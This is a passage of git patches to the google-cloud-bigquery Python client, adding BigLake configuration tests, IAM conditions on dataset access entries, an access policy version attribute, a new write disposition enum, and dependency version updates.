self.assertEqual(table.biglake_configuration.file_format, "PARQUET") + self.assertEqual(table.biglake_configuration.table_format, "ICEBERG") + else: + self.assertIsNone(table.biglake_configuration) + def test_ctor(self): dataset = DatasetReference(self.PROJECT, self.DS_ID) table_ref = dataset.table(self.TABLE_NAME) @@ -893,6 +908,60 @@ def test_table_constraints_property_getter(self): assert isinstance(table_constraints, TableConstraints) assert table_constraints.primary_key == PrimaryKey(columns=["id"]) + def test_biglake_configuration_not_set(self): + dataset = DatasetReference(self.PROJECT, self.DS_ID) + table_ref = dataset.table(self.TABLE_NAME) + table = self._make_one(table_ref) + + assert table.biglake_configuration is None + + def test_biglake_configuration_set(self): + from google.cloud.bigquery.table import BigLakeConfiguration + + dataset = DatasetReference(self.PROJECT, self.DS_ID) + table_ref = dataset.table(self.TABLE_NAME) + table = self._make_one(table_ref) + + table._properties["biglakeConfiguration"] = { + "connectionId": "connection", + "storageUri": "uri", + "fileFormat": "PARQUET", + "tableFormat": "ICEBERG", + } + + config = table.biglake_configuration + + assert isinstance(config, BigLakeConfiguration) + assert config.connection_id == "connection" + assert config.storage_uri == "uri" + assert config.file_format == "PARQUET" + assert config.table_format == "ICEBERG" + + def test_biglake_configuration_property_setter(self): + from google.cloud.bigquery.table import BigLakeConfiguration + + dataset = DatasetReference(self.PROJECT, self.DS_ID) + table_ref = dataset.table(self.TABLE_NAME) + table = self._make_one(table_ref) + + config = BigLakeConfiguration( + connection_id="connection", + storage_uri="uri", + file_format="PARQUET", + table_format="ICEBERG", + ) + table.biglake_configuration = config + + assert table._properties["biglakeConfiguration"] == { + "connectionId": "connection", + "storageUri": "uri", + "fileFormat": "PARQUET", + "tableFormat": "ICEBERG", + } + + table.biglake_configuration = None + assert table.biglake_configuration is None + def test_table_constraints_property_setter(self): from google.cloud.bigquery.table import ( ColumnReference, @@ -2166,6 +2235,97 @@ def test_ctor_full_resource(self): assert instance.snapshot_time == expected_time +class TestBigLakeConfiguration(unittest.TestCase): + @staticmethod + def _get_target_class(): + from google.cloud.bigquery.table import BigLakeConfiguration + + return BigLakeConfiguration + + @classmethod + def _make_one(cls, *args, **kwargs): + klass = cls._get_target_class() + return klass(*args, **kwargs) + + def test_ctor_empty_resource(self): + instance = self._make_one() + self.assertIsNone(instance.connection_id) + self.assertIsNone(instance.storage_uri) + self.assertIsNone(instance.file_format) + self.assertIsNone(instance.table_format) + + def test_ctor_kwargs(self): + instance = self._make_one( + connection_id="conn", + storage_uri="uri", + file_format="FILE", + table_format="TABLE", + ) + self.assertEqual(instance.connection_id, "conn") + self.assertEqual(instance.storage_uri, "uri") + self.assertEqual(instance.file_format, "FILE") + self.assertEqual(instance.table_format, "TABLE") + + def test_ctor_full_resource(self): + resource = { + "connectionId": "conn", + "storageUri": "uri", + "fileFormat": "FILE", + "tableFormat": "TABLE", + } + instance = self._make_one(_properties=resource) + self.assertEqual(instance.connection_id, "conn") + self.assertEqual(instance.storage_uri, "uri") + self.assertEqual(instance.file_format, "FILE") + self.assertEqual(instance.table_format, "TABLE") + + def test_to_api_repr(self): + resource = { + "connectionId": "conn", + "storageUri": "uri", + "fileFormat": "FILE", + "tableFormat": "TABLE", + } + instance = self._make_one(_properties=resource) + self.assertEqual(instance.to_api_repr(), resource) + + def test_from_api_repr_partial(self): + klass = self._get_target_class() + api_repr = {"fileFormat": "FILE"} + instance = klass.from_api_repr(api_repr) + + self.assertIsNone(instance.connection_id) + self.assertIsNone(instance.storage_uri) + self.assertEqual(instance.file_format, "FILE") + self.assertIsNone(instance.table_format) + + def test_comparisons(self): + resource = { + "connectionId": "conn", + "storageUri": "uri", + "fileFormat": "FILE", + "tableFormat": "TABLE", + } + + first = self._make_one(_properties=resource) + second = self._make_one(_properties=copy.deepcopy(resource)) + # Exercise comparator overloads. + # first and second should be equivalent. + self.assertNotEqual(first, resource) + self.assertEqual(first, second) + self.assertEqual(hash(first), hash(second)) + + # Update second to ensure that first and second are no longer equivalent. + second.connection_id = "foo" + self.assertNotEqual(first, second) + self.assertNotEqual(hash(first), hash(second)) + + # Update first with the same change, restoring equivalence. + first.connection_id = "foo" + self.assertEqual(first, second) + self.assertEqual(hash(first), hash(second)) + + class TestCloneDefinition: @staticmethod def _get_target_class(): From 7301667272dfbdd04b1a831418a9ad2d037171fb Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Tue, 29 Apr 2025 09:16:36 -0400 Subject: [PATCH 091/202] feat: Update the AccessEntry class with a new condition attribute and unit tests (#2163) * feat: adds condition class and assoc. unit tests * Updates AccessEntry with condition setter/getter * Adds condition attr to AccessEntry and unit tests * adds tests for Condition dunder methods to ensure coverage * moves the entity_type logic out of _from_api_repr to entity_type setter * Updates logic in entity_type getter * updates several AccessEntry related tests * Updates AccessEntry condition setter test to use a dict * udpates entity_id handling * Updates _entity_type access * tweaks type hinting * Update tests/unit/test_dataset.py * Update tests/unit/test_dataset.py * Updates DatasetReference in test and __eq__ check * remove debug print statement --- google/cloud/bigquery/dataset.py | 126 ++++++++++-- tests/unit/test_dataset.py | 336 +++++++++++++++++++++++++++++-- 2 files changed, 432 insertions(+), 30 deletions(-) diff --git a/google/cloud/bigquery/dataset.py b/google/cloud/bigquery/dataset.py index cc14598fe..670fe127c 100644 --- a/google/cloud/bigquery/dataset.py +++ b/google/cloud/bigquery/dataset.py @@ -298,12 +298,15 @@ def __init__( role: Optional[str] = None, entity_type: Optional[str] = None, entity_id: Optional[Union[Dict[str, Any], str]] = None, + **kwargs, ): - self._properties = {} + self._properties: Dict[str, Any] = {} if entity_type is not None: self._properties[entity_type] = entity_id self._properties["role"] = role - self._entity_type = entity_type + self._entity_type: Optional[str] = entity_type + for prop, val in kwargs.items(): + setattr(self, prop, val) @property def role(self) -> Optional[str]: @@ -330,6 +333,9 @@ def dataset(self, value): if isinstance(value, str): value = DatasetReference.from_string(value).to_api_repr() + if isinstance(value, DatasetReference): + value = value.to_api_repr() + if isinstance(value, (Dataset, DatasetListItem)): value = value.reference.to_api_repr() @@ -437,15 +443,65 @@ def special_group(self) -> Optional[str]: def special_group(self, value): self._properties["specialGroup"] = value + @property + def condition(self) -> Optional["Condition"]: + """Optional[Condition]: The IAM condition associated with this entry.""" + value = typing.cast(Dict[str, Any], self._properties.get("condition")) + return Condition.from_api_repr(value) if value else None + + @condition.setter + def condition(self, value: Union["Condition", dict, None]): + """Set the IAM condition for this entry.""" + if value is None: + self._properties["condition"] = None + elif isinstance(value, Condition): + self._properties["condition"] = value.to_api_repr() + elif isinstance(value, dict): + self._properties["condition"] = value + else: + raise TypeError("condition must be a Condition object, dict, or None") + @property def entity_type(self) -> Optional[str]: """The entity_type of the entry.""" + + # The api_repr for an AccessEntry object is expected to be a dict with + # only a few keys. Two keys that may be present are role and condition. + # Any additional key is going to have one of ~eight different names: + # userByEmail, groupByEmail, domain, dataset, specialGroup, view, + # routine, iamMember + + # if self._entity_type is None, see if it needs setting + # i.e. is there a key: value pair that should be associated with + # entity_type and entity_id? + if self._entity_type is None: + resource = self._properties.copy() + # we are empyting the dict to get to the last `key: value`` pair + # so we don't keep these first entries + _ = resource.pop("role", None) + _ = resource.pop("condition", None) + + try: + # we only need entity_type, because entity_id gets set elsewhere. + entity_type, _ = resource.popitem() + except KeyError: + entity_type = None + + self._entity_type = entity_type + return self._entity_type @property def entity_id(self) -> Optional[Union[Dict[str, Any], str]]: """The entity_id of the entry.""" - return self._properties.get(self._entity_type) if self._entity_type else None + if self.entity_type: + entity_type = self.entity_type + else: + return None + return typing.cast( + Optional[Union[Dict[str, Any], str]], + self._properties.get(entity_type, None), + ) def __eq__(self, other): if not isinstance(other, AccessEntry): @@ -464,7 +520,16 @@ def _key(self): Returns: Tuple: The contents of this :class:`~google.cloud.bigquery.dataset.AccessEntry`. """ + properties = self._properties.copy() + + # Dicts are not hashable. + # Convert condition to a hashable datatype(s) + condition = properties.get("condition") + if isinstance(condition, dict): + condition_key = tuple(sorted(condition.items())) + properties["condition"] = condition_key + prop_tup = tuple(sorted(properties.items())) return (self.role, self._entity_type, self.entity_id, prop_tup) @@ -491,19 +556,11 @@ def from_api_repr(cls, resource: dict) -> "AccessEntry": Returns: google.cloud.bigquery.dataset.AccessEntry: Access entry parsed from ``resource``. - - Raises: - ValueError: - If the resource has more keys than ``role`` and one additional - key. """ - entry = resource.copy() - role = entry.pop("role", None) - entity_type, entity_id = entry.popitem() - if len(entry) != 0: - raise ValueError("Entry has unexpected keys remaining.", entry) - return cls(role, entity_type, entity_id) + access_entry = cls() + access_entry._properties = resource.copy() + return access_entry class Dataset(object): @@ -1160,6 +1217,43 @@ def from_api_repr(cls, resource: Dict[str, Any]) -> "Condition": return cls( expression=resource["expression"], - title=resource.get("title"), - description=resource.get("description"), + title=resource.get("title", None), + description=resource.get("description", None), ) + + def __eq__(self, other: object) -> bool: + """Check for equality based on expression, title, and description.""" + if not isinstance(other, Condition): + return NotImplemented + return self._key() == other._key() + + def _key(self): + """A tuple key that uniquely describes this field. + Used to compute this instance's hashcode and evaluate equality. + Returns: + Tuple: The contents of this :class:`~google.cloud.bigquery.dataset.AccessEntry`. + """ + + properties = self._properties.copy() + + # Dicts are not hashable. + # Convert object to a hashable datatype(s) + prop_tup = tuple(sorted(properties.items())) + return prop_tup + + def __ne__(self, other: object) -> bool: + """Check for inequality.""" + return not self == other + + def __hash__(self) -> int: + """Generate a hash based on expression, title, and description.""" + return hash(self._key()) + + def __repr__(self) -> str: + """Return a string representation of the Condition object.""" + parts = [f"expression={self.expression!r}"] + if self.title is not None: + parts.append(f"title={self.title!r}") + if self.description is not None: + parts.append(f"description={self.description!r}") + return f"Condition({', '.join(parts)})" diff --git a/tests/unit/test_dataset.py b/tests/unit/test_dataset.py index 036e22458..51f1809bf 100644 --- a/tests/unit/test_dataset.py +++ b/tests/unit/test_dataset.py @@ -167,7 +167,10 @@ def test_from_api_repr_wo_role(self): entity_type="view", entity_id=resource["view"], ) - self.assertEqual(entry, exp_entry) + + assert entry.entity_type == exp_entry.entity_type + assert entry.entity_id == exp_entry.entity_id + assert entry.role is None def test_to_api_repr_w_extra_properties(self): resource = { @@ -179,15 +182,6 @@ def test_to_api_repr_w_extra_properties(self): exp_resource = entry.to_api_repr() self.assertEqual(resource, exp_resource) - def test_from_api_repr_entries_w_extra_keys(self): - resource = { - "role": "READER", - "specialGroup": "projectReaders", - "userByEmail": "salmon@example.com", - } - with self.assertRaises(ValueError): - self._get_target_class().from_api_repr(resource) - def test_view_getter_setter(self): view = { "projectId": "my_project", @@ -307,7 +301,10 @@ def test_dataset_getter_setter_dataset_ref(self): entry.dataset = dataset_ref resource = entry.to_api_repr() exp_resource = { - "dataset": {"dataset": dataset_ref, "targetTypes": None}, + "dataset": { + "dataset": {"datasetId": "my_dataset", "projectId": "my-project"}, + "targetTypes": None, + }, "role": None, } self.assertEqual(resource, exp_resource) @@ -494,6 +491,262 @@ def test_dataset_target_types_getter_setter_w_dataset(self): self.assertEqual(entry.dataset_target_types, target_types) +# --- Tests for AccessEntry when using Condition --- + +EXPRESSION = "request.time < timestamp('2026-01-01T00:00:00Z')" +TITLE = "Expires end 2025" +DESCRIPTION = "Access expires at the start of 2026." + + +@pytest.fixture +def condition_1(): + """Provides a sample Condition object.""" + return Condition( + expression=EXPRESSION, + title=TITLE, + description=DESCRIPTION, + ) + + +@pytest.fixture +def condition_1_api_repr(): + """Provides the API representation for condition_1.""" + # Use the actual to_api_repr method + return Condition( + expression=EXPRESSION, + title=TITLE, + description=DESCRIPTION, + ).to_api_repr() + + +@pytest.fixture +def condition_2(): + """Provides a second, different Condition object.""" + return Condition( + expression="resource.name.startsWith('projects/_/buckets/restricted/')", + title="Restricted Buckets", + ) + + +@pytest.fixture +def condition_2_api_repr(): + """Provides the API representation for condition2.""" + # Use the actual to_api_repr method + return Condition( + expression="resource.name.startsWith('projects/_/buckets/restricted/')", + title="Restricted Buckets", + ).to_api_repr() + + +class TestAccessEntryAndCondition: + @staticmethod + def _get_target_class(): + return AccessEntry + + def _make_one(self, *args, **kw): + return self._get_target_class()(*args, **kw) + + # Test __init__ without condition + def test_init_without_condition(self): + entry = AccessEntry("READER", "userByEmail", "test@example.com") + assert entry.role == "READER" + assert entry.entity_type == "userByEmail" + assert entry.entity_id == "test@example.com" + assert entry.condition is None + # Accessing _properties is for internal verification in tests + assert "condition" not in entry._properties + + # Test __init__ with condition object + def test_init_with_condition_object(self, condition_1, condition_1_api_repr): + entry = AccessEntry( + "READER", "userByEmail", "test@example.com", condition=condition_1 + ) + assert entry.condition == condition_1 + assert entry._properties.get("condition") == condition_1_api_repr + + # Test __init__ with condition=None + def test_init_with_condition_none(self): + entry = AccessEntry("READER", "userByEmail", "test@example.com", condition=None) + assert entry.condition is None + + # Test condition getter/setter + def test_condition_getter_setter( + self, condition_1, condition_1_api_repr, condition_2, condition_2_api_repr + ): + entry = AccessEntry("WRITER", "group", "admins@example.com") + assert entry.condition is None + + # Set condition 1 + entry.condition = condition_1 + assert entry.condition.to_api_repr() == condition_1_api_repr + assert entry._properties.get("condition") == condition_1_api_repr + + # Set condition 2 + entry.condition = condition_2 + assert entry.condition.to_api_repr() == condition_2_api_repr + assert entry._properties.get("condition") != condition_1_api_repr + assert entry._properties.get("condition") == condition_2.to_api_repr() + + # Set back to None + entry.condition = None + assert entry.condition is None + + # Set condition using a dict + entry.condition = condition_1_api_repr + assert entry._properties.get("condition") == condition_1_api_repr + + # Test setter validation + def test_condition_setter_invalid_type(self): + entry = AccessEntry("READER", "domain", "example.com") + with pytest.raises( + TypeError, match="condition must be a Condition object, dict, or None" + ): + entry.condition = 123 # type: ignore + + # Test equality/hash without condition + def test_equality_and_hash_without_condition(self): + entry1 = AccessEntry("OWNER", "specialGroup", "projectOwners") + entry2 = AccessEntry("OWNER", "specialGroup", "projectOwners") + entry3 = AccessEntry("WRITER", "specialGroup", "projectOwners") + assert entry1 == entry2 + assert entry1 != entry3 + assert hash(entry1) == hash(entry2) + assert hash(entry1) != hash(entry3) # Usually true + + def test_equality_and_hash_with_condition(self, condition_1, condition_2): + cond1a = Condition( + condition_1.expression, condition_1.title, condition_1.description + ) + cond1b = Condition( + condition_1.expression, condition_1.title, condition_1.description + ) # Same values, different object + + entry1a = AccessEntry( + "READER", "userByEmail", "a@example.com", condition=cond1a + ) + entry1b = AccessEntry( + "READER", "userByEmail", "a@example.com", condition=cond1b + ) # Different Condition instance + entry2 = AccessEntry( + "READER", "userByEmail", "a@example.com", condition=condition_2 + ) + entry3 = AccessEntry("READER", "userByEmail", "a@example.com") # No condition + entry4 = AccessEntry( + "WRITER", "userByEmail", "a@example.com", condition=cond1a + ) # Different role + + assert entry1a == entry1b + assert entry1a != entry2 + assert entry1a != entry3 + assert entry1a != entry4 + assert entry2 != entry3 + + assert hash(entry1a) == hash(entry1b) + assert hash(entry1a) != hash(entry2) # Usually true + assert hash(entry1a) != hash(entry3) # Usually true + assert hash(entry1a) != hash(entry4) # Usually true + + # Test to_api_repr with condition + def test_to_api_repr_with_condition(self, condition_1, condition_1_api_repr): + entry = AccessEntry( + "WRITER", "groupByEmail", "editors@example.com", condition=condition_1 + ) + expected_repr = { + "role": "WRITER", + "groupByEmail": "editors@example.com", + "condition": condition_1_api_repr, + } + assert entry.to_api_repr() == expected_repr + + def test_view_property_with_condition(self, condition_1): + """Test setting/getting view property when condition is present.""" + entry = AccessEntry(role=None, entity_type="view", condition=condition_1) + view_ref = TableReference(DatasetReference("proj", "dset"), "view_tbl") + entry.view = view_ref # Use the setter + assert entry.view == view_ref + assert entry.condition == condition_1 # Condition should persist + assert entry.role is None + assert entry.entity_type == "view" + + # Check internal representation + assert "view" in entry._properties + assert "condition" in entry._properties + + def test_user_by_email_property_with_condition(self, condition_1): + """Test setting/getting user_by_email property when condition is present.""" + entry = AccessEntry( + role="READER", entity_type="userByEmail", condition=condition_1 + ) + email = "test@example.com" + entry.user_by_email = email # Use the setter + assert entry.user_by_email == email + assert entry.condition == condition_1 # Condition should persist + assert entry.role == "READER" + assert entry.entity_type == "userByEmail" + + # Check internal representation + assert "userByEmail" in entry._properties + assert "condition" in entry._properties + + # Test from_api_repr without condition + def test_from_api_repr_without_condition(self): + api_repr = {"role": "OWNER", "userByEmail": "owner@example.com"} + entry = AccessEntry.from_api_repr(api_repr) + assert entry.role == "OWNER" + assert entry.entity_type == "userByEmail" + assert entry.entity_id == "owner@example.com" + assert entry.condition is None + + # Test from_api_repr with condition + def test_from_api_repr_with_condition(self, condition_1, condition_1_api_repr): + api_repr = { + "role": "READER", + "view": {"projectId": "p", "datasetId": "d", "tableId": "v"}, + "condition": condition_1_api_repr, + } + entry = AccessEntry.from_api_repr(api_repr) + assert entry.role == "READER" + assert entry.entity_type == "view" + # The entity_id for view/routine/dataset is the dict itself + assert entry.entity_id == {"projectId": "p", "datasetId": "d", "tableId": "v"} + assert entry.condition == condition_1 + + # Test from_api_repr edge case + def test_from_api_repr_no_entity(self, condition_1, condition_1_api_repr): + api_repr = {"role": "READER", "condition": condition_1_api_repr} + entry = AccessEntry.from_api_repr(api_repr) + assert entry.role == "READER" + assert entry.entity_type is None + assert entry.entity_id is None + assert entry.condition == condition_1 + + def test_dataset_property_with_condition(self, condition_1): + project = "my-project" + dataset_id = "my_dataset" + dataset_ref = DatasetReference(project, dataset_id) + entry = self._make_one(None) + entry.dataset = dataset_ref + entry.condition = condition_1 + + resource = entry.to_api_repr() + exp_resource = { + "role": None, + "dataset": { + "dataset": {"datasetId": "my_dataset", "projectId": "my-project"}, + "targetTypes": None, + }, + "condition": { + "expression": "request.time < timestamp('2026-01-01T00:00:00Z')", + "title": "Expires end 2025", + "description": "Access expires at the start of 2026.", + }, + } + assert resource == exp_resource + # Check internal representation + assert "dataset" in entry._properties + assert "condition" in entry._properties + + class TestDatasetReference(unittest.TestCase): @staticmethod def _get_target_class(): @@ -821,7 +1074,15 @@ def test_ctor_explicit(self): self.assertEqual( dataset.path, "/projects/%s/datasets/%s" % (OTHER_PROJECT, self.DS_ID) ) - self.assertEqual(dataset.access_entries, entries) + # creating a list of entries relies on AccessEntry.from_api_repr + # which does not create an object in exactly the same way as calling the + # class directly. We rely on calls to .entity_type and .entity_id to + # finalize the settings on each class. + entry_pairs = zip(dataset.access_entries, entries) + for pair in entry_pairs: + assert pair[0].role == pair[1].role + assert pair[0].entity_type == pair[1].entity_type + assert pair[0].entity_id == pair[1].entity_id self.assertIsNone(dataset.created) self.assertIsNone(dataset.full_dataset_id) @@ -854,8 +1115,18 @@ def test_access_entries_setter(self): dataset = self._make_one(self.DS_REF) phred = AccessEntry("OWNER", "userByEmail", "phred@example.com") bharney = AccessEntry("OWNER", "userByEmail", "bharney@example.com") - dataset.access_entries = [phred, bharney] - self.assertEqual(dataset.access_entries, [phred, bharney]) + entries = [phred, bharney] + dataset.access_entries = entries + + # creating a list of entries relies on AccessEntry.from_api_repr + # which does not create an object in exactly the same way as calling the + # class directly. We rely on calls to .entity_type and .entity_id to + # finalize the settings on each class. + entry_pairs = zip(dataset.access_entries, entries) + for pair in entry_pairs: + assert pair[0].role == pair[1].role + assert pair[0].entity_type == pair[1].entity_type + assert pair[0].entity_id == pair[1].entity_id def test_default_partition_expiration_ms(self): dataset = self._make_one("proj.dset") @@ -1383,3 +1654,40 @@ def test_validation_expression_required_from_api(self): ValueError, match="API representation missing required 'expression' field." ): Condition.from_api_repr(api_repr) + + def test___eq___equality(self, condition_1): + result = condition_1 + expected = condition_1 + assert result == expected + + def test___eq___equality_not_condition(self, condition_1): + result = condition_1 + other = "not a condition" + expected = result.__eq__(other) + assert expected is NotImplemented + + def test__ne__not_equality(self): + result = condition_1 + expected = condition_2 + assert result != expected + + def test__hash__function(self, condition_2): + cond1 = Condition( + expression=self.EXPRESSION, title=self.TITLE, description=self.DESCRIPTION + ) + cond2 = cond1 + cond_not_equal = condition_2 + assert cond1 == cond2 + assert cond1 is cond2 + assert hash(cond1) == hash(cond2) + assert hash(cond1) is not None + assert cond_not_equal != cond1 + assert hash(cond_not_equal) != hash(cond1) + + def test__hash__with_minimal_inputs(self): + cond1 = Condition( + expression="example", + title=None, + description=None, + ) + assert hash(cond1) is not None From b7656b97c1bd6c204d0508b1851d114719686655 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Thu, 1 May 2025 17:20:21 -0400 Subject: [PATCH 092/202] feat: add dataset access policy version attribute (#2169) * feat: adds condition class and assoc. unit tests * Updates two test cases for empty string * Updates tests for clarity * Updates access_policy_version setter and unittest --- google/cloud/bigquery/dataset.py | 15 +++++++++++++-- tests/unit/test_dataset.py | 30 ++++++++++++++++++++++++++++++ 2 files changed, 43 insertions(+), 2 deletions(-) diff --git a/google/cloud/bigquery/dataset.py b/google/cloud/bigquery/dataset.py index 670fe127c..d225b7106 100644 --- a/google/cloud/bigquery/dataset.py +++ b/google/cloud/bigquery/dataset.py @@ -589,6 +589,7 @@ class Dataset(object): "default_rounding_mode": "defaultRoundingMode", "resource_tags": "resourceTags", "external_catalog_dataset_options": "externalCatalogDatasetOptions", + "access_policy_version": "accessPolicyVersion", } def __init__(self, dataset_ref) -> None: @@ -979,6 +980,16 @@ def external_catalog_dataset_options(self, value): self._PROPERTY_TO_API_FIELD["external_catalog_dataset_options"] ] = (value.to_api_repr() if value is not None else None) + @property + def access_policy_version(self): + return self._properties.get("accessPolicyVersion") + + @access_policy_version.setter + def access_policy_version(self, value): + if not isinstance(value, int) and value is not None: + raise ValueError("Pass an integer, or None") + self._properties["accessPolicyVersion"] = value + @classmethod def from_string(cls, full_dataset_id: str) -> "Dataset": """Construct a dataset from fully-qualified dataset ID. @@ -1217,8 +1228,8 @@ def from_api_repr(cls, resource: Dict[str, Any]) -> "Condition": return cls( expression=resource["expression"], - title=resource.get("title", None), - description=resource.get("description", None), + title=resource.get("title"), + description=resource.get("description"), ) def __eq__(self, other: object) -> bool: diff --git a/tests/unit/test_dataset.py b/tests/unit/test_dataset.py index 51f1809bf..941430827 100644 --- a/tests/unit/test_dataset.py +++ b/tests/unit/test_dataset.py @@ -1049,6 +1049,7 @@ def test_ctor_defaults(self): self.assertIsNone(dataset.friendly_name) self.assertIsNone(dataset.location) self.assertEqual(dataset.is_case_insensitive, False) + self.assertIsNone(dataset.access_policy_version) def test_ctor_string(self): dataset = self._make_one("some-project.some_dset") @@ -1423,6 +1424,35 @@ def test_external_catalog_dataset_options_to_api_repr(self): expected = api_repr["externalCatalogDatasetOptions"] assert result == expected + def test_access_policy_version_valid_input(self): + dataset = self._make_one(self.DS_REF) + # Valid inputs for access_policy_version are currently + # ints 1, 2, 3, and None + # We rely upon the BQ backend to validate acceptable integer + # values, rather than perform that validation in the client. + for expected in [1, 2, 3, None]: + # set property using setter and integer + dataset.access_policy_version = expected + + # check getter and _properties dict + assert ( + dataset.access_policy_version == expected + ), f"Expected {expected} but got {dataset.access_policy_version}" + assert dataset._properties["accessPolicyVersion"] == expected + + def test_access_policy_version_invalid_input(self): + dataset = self._make_one(self.DS_REF) + # Valid inputs for access_policy_version are currently + # ints 1, 2, 3, and None + + with pytest.raises(ValueError): + invalid_value = "a string" + dataset.access_policy_version = invalid_value + + with pytest.raises(ValueError): + invalid_value = 42.0 + dataset.access_policy_version = invalid_value + class TestDatasetListItem(unittest.TestCase): @staticmethod From 46927479085f13fd326e3f2388f60dfdd37f7f69 Mon Sep 17 00:00:00 2001 From: shollyman Date: Thu, 1 May 2025 14:52:26 -0700 Subject: [PATCH 093/202] feat: add WRITE_TRUNCATE_DATA enum (#2166) This PR documents the new WRITE_TRUNCATE_DATA write disposition by adding the enum value. internal issue: b/406848221 --- google/cloud/bigquery/enums.py | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/google/cloud/bigquery/enums.py b/google/cloud/bigquery/enums.py index b32fc8200..203ea3c7b 100644 --- a/google/cloud/bigquery/enums.py +++ b/google/cloud/bigquery/enums.py @@ -338,6 +338,10 @@ class WriteDisposition(object): WRITE_TRUNCATE = "WRITE_TRUNCATE" """If the table already exists, BigQuery overwrites the table data.""" + WRITE_TRUNCATE_DATA = "WRITE_TRUNCATE_DATA" + """For existing tables, truncate data but preserve existing schema + and constraints.""" + WRITE_EMPTY = "WRITE_EMPTY" """If the table already exists and contains data, a 'duplicate' error is returned in the job result.""" From 5c8e9179923d914745eaa98fc52a9d8577fe2484 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Mon, 12 May 2025 18:34:55 +0200 Subject: [PATCH 094/202] chore(deps): update all dependencies (#2158) * chore(deps): update all dependencies * Update samples/geography/requirements.txt --------- Co-authored-by: Chalmer Lowe --- samples/desktopapp/requirements-test.txt | 2 +- samples/desktopapp/requirements.txt | 2 +- samples/geography/requirements.txt | 25 ++++++++++++------------ samples/magics/requirements-test.txt | 2 +- samples/magics/requirements.txt | 2 +- samples/notebooks/requirements-test.txt | 2 +- samples/notebooks/requirements.txt | 6 +++--- samples/snippets/requirements-test.txt | 2 +- 8 files changed, 22 insertions(+), 21 deletions(-) diff --git a/samples/desktopapp/requirements-test.txt b/samples/desktopapp/requirements-test.txt index 183230cf4..6abea3b4d 100644 --- a/samples/desktopapp/requirements-test.txt +++ b/samples/desktopapp/requirements-test.txt @@ -1,4 +1,4 @@ -google-cloud-testutils==1.6.0 +google-cloud-testutils==1.6.2 pytest==8.3.5 mock==5.2.0 pytest-xdist==3.6.1 diff --git a/samples/desktopapp/requirements.txt b/samples/desktopapp/requirements.txt index fa349e0d3..b98f4ace9 100644 --- a/samples/desktopapp/requirements.txt +++ b/samples/desktopapp/requirements.txt @@ -1,2 +1,2 @@ google-cloud-bigquery==3.31.0 -google-auth-oauthlib==1.2.1 +google-auth-oauthlib==1.2.2 diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 37bcdf687..2b5a71c8c 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -1,8 +1,9 @@ attrs==25.3.0 -certifi==2025.1.31 +certifi==2025.4.26 cffi==1.17.1 -charset-normalizer==3.4.1 -click==8.1.8 +charset-normalizer==3.4.2 +click===8.1.8; python_version == '3.9' +click==8.2.0; python_version >= '3.10' click-plugins==1.1.1 cligj==0.7.2 db-dtypes==1.4.2 @@ -10,21 +11,21 @@ Fiona==1.10.1 geojson==3.2.0 geopandas==1.0.1 google-api-core==2.24.2 -google-auth==2.38.0 +google-auth==2.40.1 google-cloud-bigquery==3.31.0 -google-cloud-bigquery-storage==2.30.0 +google-cloud-bigquery-storage==2.31.0 google-cloud-core==2.4.3 google-crc32c==1.7.1 google-resumable-media==2.7.2 -googleapis-common-protos==1.69.2 +googleapis-common-protos==1.70.0 grpcio==1.71.0 idna==3.10 munch==4.0.0 -mypy-extensions==1.0.0 -packaging==24.2 +mypy-extensions==1.1.0 +packaging==25.0 pandas==2.2.3 proto-plus==1.26.1 -pyarrow==19.0.1 +pyarrow==20.0.0 pyasn1==0.6.1 pyasn1-modules==0.4.2 pycparser==2.22 @@ -33,10 +34,10 @@ python-dateutil==2.9.0.post0 pytz==2025.2 PyYAML==6.0.2 requests==2.32.3 -rsa==4.9 +rsa==4.9.1 Shapely===2.0.7; python_version == '3.9' Shapely==2.1.0; python_version >= '3.10' six==1.17.0 -typing-extensions==4.13.1 +typing-extensions==4.13.2 typing-inspect==0.9.0 -urllib3==2.3.0 +urllib3==2.4.0 diff --git a/samples/magics/requirements-test.txt b/samples/magics/requirements-test.txt index 183230cf4..6abea3b4d 100644 --- a/samples/magics/requirements-test.txt +++ b/samples/magics/requirements-test.txt @@ -1,4 +1,4 @@ -google-cloud-testutils==1.6.0 +google-cloud-testutils==1.6.2 pytest==8.3.5 mock==5.2.0 pytest-xdist==3.6.1 diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index 3ab215951..2c9e158c0 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,6 +1,6 @@ bigquery_magics==0.9.0 db-dtypes==1.4.2 google.cloud.bigquery==3.31.0 -google-cloud-bigquery-storage==2.30.0 +google-cloud-bigquery-storage==2.31.0 ipython===8.18.1 pandas==2.2.3 diff --git a/samples/notebooks/requirements-test.txt b/samples/notebooks/requirements-test.txt index 183230cf4..6abea3b4d 100644 --- a/samples/notebooks/requirements-test.txt +++ b/samples/notebooks/requirements-test.txt @@ -1,4 +1,4 @@ -google-cloud-testutils==1.6.0 +google-cloud-testutils==1.6.2 pytest==8.3.5 mock==5.2.0 pytest-xdist==3.6.1 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index ca5505a2e..d1e2f39fb 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,9 +1,9 @@ bigquery-magics==0.9.0 db-dtypes==1.4.2 google-cloud-bigquery==3.31.0 -google-cloud-bigquery-storage==2.30.0 +google-cloud-bigquery-storage==2.31.0 ipython===8.18.1; python_version == '3.9' -ipython==9.0.2; python_version >= '3.10' +ipython==9.2.0; python_version >= '3.10' matplotlib===3.9.2; python_version == '3.9' -matplotlib==3.10.1; python_version >= '3.10' +matplotlib==3.10.3; python_version >= '3.10' pandas==2.2.3 diff --git a/samples/snippets/requirements-test.txt b/samples/snippets/requirements-test.txt index 0cf0bb6b4..6760e1228 100644 --- a/samples/snippets/requirements-test.txt +++ b/samples/snippets/requirements-test.txt @@ -1,5 +1,5 @@ # samples/snippets should be runnable with no "extras" -google-cloud-testutils==1.6.0 +google-cloud-testutils==1.6.2 pytest==8.3.5 mock==5.2.0 pytest-xdist==3.6.1 From 185116ead5f68b959feb339566e964572fe12692 Mon Sep 17 00:00:00 2001 From: "release-please[bot]" <55107282+release-please[bot]@users.noreply.github.com> Date: Mon, 12 May 2025 13:04:01 -0400 Subject: [PATCH 095/202] 